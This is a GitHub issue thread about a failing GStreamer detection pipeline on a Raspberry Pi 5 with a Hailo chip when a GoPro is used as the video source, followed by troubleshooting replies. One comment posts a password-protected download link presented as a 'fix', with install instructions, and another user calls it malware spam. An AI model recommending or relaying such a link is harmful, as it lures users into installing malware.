### ISSUE TITLE
troubleshooting

### ISSUE THREAD

**Issue by HarryHayek** [hailo-ai/hailo-rpi5-examples#42]
him i'm trying to use my go pro for video input for the example but it doesn't seem to want to work. this is the error that i keep getting. 

(venv_hailo_rpi5_examples) harry@raspberrypi:~/hailo-rpi5-examples $ python basic_pipelines/detection.py --input /dev/video0
hailomuxer name=hmux v4l2src device=/dev/video0 name=src_0 ! video/x-raw, width=640, height=480, framerate=30/1 ! queue name=queue_scale max-size-buffers=3 max-size-bytes=0 max-size-time=0 ! videoscale n-threads=2 ! queue name=queue_src_convert max-size-buffers=3 max-size-bytes=0 max-size-time=0 ! videoconvert n-threads=3 name=src_convert qos=false ! video/x-raw, format=RGB, width=640, height=640, pixel-aspect-ratio=1/1 ! tee name=t ! queue name=bypass_queue max-size-buffers=20 max-size-bytes=0 max-size-time=0 ! hmux.sink_0 t. ! queue name=queue_hailonet max-size-buffers=3 max-size-bytes=0 max-size-time=0 ! videoconvert n-threads=3 ! hailonet hef-path=/home/harry/hailo-rpi5-examples/basic_pipelines/../resources/yolov6n.hef batch-size=2 nms-score-threshold=0.3 nms-iou-threshold=0.45 output-format-type=HAILO_FORMAT_TYPE_FLOAT32 force-writable=true ! queue name=queue_hailofilter max-size-buffers=3 max-size-bytes=0 max-size-time=0 ! hailofilter so-path=/home/harry/hailo-rpi5-examples/basic_pipelines/../resources/libyolo_hailortpp_post.so  qos=false ! queue name=queue_hmuc max-size-buffers=3 max-size-bytes=0 max-size-time=0 ! hmux.sink_1 hmux. ! queue name=queue_hailo_python max-size-buffers=3 max-size-bytes=0 max-size-time=0 ! queue name=queue_user_callback max-size-buffers=3 max-size-bytes=0 max-size-time=0 ! identity name=identity_callback ! queue name=queue_hailooverlay max-size-buffers=3 max-size-bytes=0 max-size-time=0 ! hailooverlay ! queue name=queue_videoconvert max-size-buffers=3 max-size-bytes=0 max-size-time=0 ! videoconvert n-threads=3 qos=false ! queue name=queue_hailo_display max-size-buffers=3 max-size-bytes=0 max-size-time=0 ! fpsdisplaysink video-sink=xvimagesink name=hailo_display sync=false text-overlay=False signal-fps-measurements=true 
Error: gst-stream-error-quark: Internal data stream error. (1), ../libs/gst/base/gstbasesrc.c(3132): gst_base_src_loop (): /GstPipeline:pipeline0/GstV4l2Src:src_0:
streaming stopped, reason not-negotiated (-4)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by marcory-hub** [comment]
Don't follow the link posted by a malware spammer.

**Comment by HarryHayek** [comment]
Though so was gonna run it on my scrap laptop on my vm

**Comment by giladnah** [comment]
Make sure your camera is mapped to /dev/video0. You can test by running `ffplay /dev/video0`
Sometimes it is on another device (video2,4,6,8 etc...)

**Comment by HarryHayek** [comment]
Yes that works and I know it's video0 because my other image processing code uses it. But having trouble actually incorporating hailo chip

**Comment by dixitm624** [comment]
hey @HarryHayek did you get out of this problem?

**Comment by HarryHayek** [comment]
@dixitm624 nope but I think I understand what i might need to do to get it working since I got it working with a pi cam so I know that the chip works and that the gopro works. Just have to create a new halo model probably
